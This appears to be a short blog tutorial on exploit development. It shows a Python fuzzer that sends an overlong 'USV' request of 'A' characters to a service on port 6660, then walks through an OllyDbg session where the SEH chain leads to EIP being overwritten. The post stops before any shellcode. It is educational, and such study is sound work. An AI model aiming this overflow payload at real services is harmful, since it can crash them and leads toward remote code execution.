Fuzzing :
#!/usr/bin/python
import socket
target="192.168.1.101"
target_port=6660
buff="USV " + "\x41" * 2500
buff+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target,target_port))
sock.send(buff)
print "Sukses....!!"
sock.close()
run this fuzzer and see what happens..in Ollydbg
But, EIP not overwrite with our fuzzer, because this application compiled with SEH and safeSEH. To look into SEH, select view+SEH chain.
So, press shift+F9 button to forward our fuzzer in to EIP.
In the figure above, we can see that EIP overwrite with 41414141, where this characters comes from the fuzzer.
To be continue...^_^
No comments:
Post a Comment